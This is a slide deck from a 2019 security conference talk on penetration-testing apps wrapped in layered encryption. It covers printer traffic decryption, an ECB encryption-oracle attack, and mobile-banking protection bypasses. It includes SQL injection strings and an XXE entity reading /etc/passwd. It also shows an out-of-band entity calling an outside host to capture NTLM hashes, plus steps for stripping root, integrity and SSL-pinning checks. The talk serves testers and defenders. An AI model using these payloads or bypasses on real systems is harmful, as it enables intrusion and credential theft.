SlideShare une entreprise Scribd logo
1  sur  78
Télécharger pour lire hors ligne
We need to go deeper
Testing inception apps
Jakub Kaluzny
CONFidence, June 2019
DevSecOps
B64:
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
DAST scanner in
CI/CD pipeline
SQLi
Is it fixed?
Base64_decode(„YWJjCg==’ OR 1=1”)
JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling,
DevSecOps, penetration
tests
• Poland, Spain, Australia
• banking, fintech, law, airline,
entertainment, e-commerce
• Speaker at BlackHat,
HackInTheBox, ZeroNights
Who
What is this all about?
HTTP
username=admin&password=abc
HTTP
username=admin&password=abc
SSL
Wireshark
Protection against what?
Sniffing, Man-in-The-Middle
SQL Injection, cross-user access control, business logic
What is this all about?
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
HTTP
username=admin&password=abc
SSL
SSL
Local HTTP proxy
Custom script
Wireshark
Inception apps
AES encrypted:
c6fa10bd98a6c4e778eac
Binary
protocol
SSL
Key exchange
during activation
Mobile app – obfuscated
Emulator and root/jailbreak detection
• Raising the bar:
• For attackers?
• For testers?
• Money:
• Scoping a test?
• Risk
• Attack surface coverage?
• Security level?
Why?
• Technical examples
• Business consequences
• And discuss pentesting processes in general
What
LET’S GET TO IT
Example 1
Enterprise printers – Pull Printing
PRINTERWORKSTATION
PRINT SERVER
https://www.slideshare.net/wojdwo/hitb-kaluzny-final
In the middle of printers
Printers down under – AES
• JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
Hidden gem – SD card
Example 1 – decompiled JAR
• JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1
Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Get the SD card Extract the key
Apply
decryption
In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
ECB encryption mode for PostScript files
Each block encrypted separately
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode
In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Communication
analysis
Decryption
script
Data extraction
Access to plaintext files, no access control
MORE
Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string
magic_string=b0dc782f6bd9
acce9bc3e9c8317b05125bb51
d9cbc4bfa56d41d7db1489f9b
bcc2cc45f774773e8adde9c41
ecd62c5bc1faafa1d2553661c
8b83012f7e968d511b3215b77
64e11fbff4c1db3aa7325e479
b31f1313d3c7bf78585f77f3f
17dc69bb9650a3bfb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3
magic_string=b0dc782f6bd9
acce9bc3e9c8317bb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3’ OR 1=1
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
aaaaaaaaaaaaaa
aKaluznyaaaaaa
aaaaaaaaaaa,
your price is
1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =luznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
Encryption Oracle
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaX.Y.Z.A,
your price is
1500.50
B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item”
5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500”
c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn”
c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us”
179762d5bba72ce4700aad2a96f5121d „er=admin&passwo”
e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=”
Encryption Oracle
031531894944dd25e457746a02f7eacf „&arbitrary=asd&&”
820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50
API
Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Communication
analysis
Encryption
oracle
Lateral
movement
Credentials would never be sent unencrypted
MITB MALWARE
DETECTION IN
JAVASCRIPT
MiTB malware - WebInjects
<title>Bank</title>
…
Password:
<input type=text>
<script src=//malware>
<title>Bank</title>
…
Password:
<input type=text>
MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…
JS-based MiTB malware detection
MiTB malware detection in JavaScript
eval
Obfuscation – base64, hex
RSA
encryption
signatures
reasoning engine
Web Service
rsa public key
https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence
@molejarka, @j_kaluzny
Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Deobfuscate JS Extract RSA keys
Decrypt
communication
MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…
TESTING MOBILE
BANKING IN 2019
Mobile banking in early 2010s
OK
Hi, I want to send $5
Standard SSL
Attack flow – Android – inception level 1
Threat
actor
Crown
jewels
Tamper with parameters
Add local proxy CA
• Export CA from local proxy
• Push it to the device
• Intercept traffic
Androd – inception level 1
Mobile banking in early 2010s
OK
Hi, I want to send $5
SSL pinning
Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2
Attack flow – inception level 2
Threat
actor
Crown
jewels
Tamper with parameters
Bypass hardcoded
SSL pinning checks
Set the proxy
• Decompile APK to Smali code
• „Void” the pinning methods or
change the certificate:
• Find the interesting
methods
• Delete the code, leaving
„return-void” at the end
• Build it, sign it
Attack flow – inception level 2
Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
HTTP body encryption
HTTP body encryption
payload=e47bf2dcd90af0d3366f
4bacfe932ffae47bf2dcd90af0d33
SSL
HTTP
Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
Attack flow – Android – 7 layers of inception
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
• Decompile APK to Smali code
• „Void” the integrity checks
Attack flow – Android – inception level 1/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• Second root check runs a minute after the first!
Attack flow – Android – inception level 2/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
Attack flow – Android – inception level 3/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
Attack flow – Android – inception level 4/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Attack flow – Android – inception level 5/7
Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
The key will be 0000000000
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7
Burp plugin – „Deszyfrator”
@slawekja
Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing
SOAP – Simple Object Access Protocol
WCF BINARY XML - SOAP
TCP
START-TLS
Let’s call it tnSOAP – totally not SOAP
mitm_relay for START-TLS
[thick client] ----▶ [mitm_relay] ----▶ [destination server]
| ▲
▼ |
[local proxy] < Intercept and
| ▲ modify traffic here
▼ |
[dummy webserver]
https://github.com/jrmdev/mitm_relay
WCF data – python-wcfbin by ERNW
[jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:m="http://www.example.org">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetStockPrice>
<m:StockName>GOOG</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...|
00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa|
00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..|
00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc|
00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam|
00000050 65 9f 03 18 e3 86 01 01 01 |e........|
00000059
Attack flow – tnSOAP
Threat
actor
Crown
jewels
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
• <!ENTITY xxe SYSTEM „file:///etc/passwd”>
• XXE OOB over FTP
• <!ENTITY „abc” SYSTEM „file://securing.biz:445/”>
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Attack flow – tnSOAP
Threat
actor
Increased
attack
surface
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Processes
Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary
Protection against what?
Sniffing, Man-in-The-Middle, Malware
SQL Injection, cross-user access control, business logic
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary
Thank you!
Twitter: @j_kaluzny
Jakub.Kaluzny@securing.biz
MORE THAN
SECURITY TESTS.

Contenu connexe

Similaire à We need t go deeper - Testing inception apps.

Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway Chris Mague
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesZuzannaKornecka
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De SouzaQA or the Highway
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataAndy LoPresto
 
Creating Responsive Experiences
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive ExperiencesTim Kadlec
 
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"IT Event
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2:  We already knowSCADA StrangeLove 2:  We already know
SCADA StrangeLove 2: We already knowqqlan
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Charles Givre
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015GregMefford
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Evolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupHadoop User Group
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...Ken DeSouza
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
 

Similaire à We need t go deeper - Testing inception apps. (20)

Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect Data
 
Creating Responsive Experiences
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive Experiences
 
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2:  We already knowSCADA StrangeLove 2:  We already know
SCADA StrangeLove 2: We already know
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Performance Risk Management
Performance Risk ManagementPerformance Risk Management
Performance Risk Management
 
Evolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing company
 
Bulletproof
BulletproofBulletproof
Bulletproof
 
Mobile security
Mobile securityMobile security
Mobile security
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user group
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applications
 

Plus de SecuRing

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersSecuRing
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!SecuRing
 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameSecuRing
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!SecuRing
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!SecuRing
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS EnvironmentsSecuRing
 
Developer in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionSecuRing
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy MechanismsSecuRing
 
How secure are webinar platforms?
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?SecuRing
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy MechanismsSecuRing
 
Serverless security: attack & defense
 Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defenseSecuRing
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleSecuRing
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainSecuRing
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsSecuRing
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSSecuRing
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?SecuRing
 

Plus de SecuRing (20)

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4Developers
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON Name
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments
 
Developer in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 edition
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms
 
How secure are webinar platforms?
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
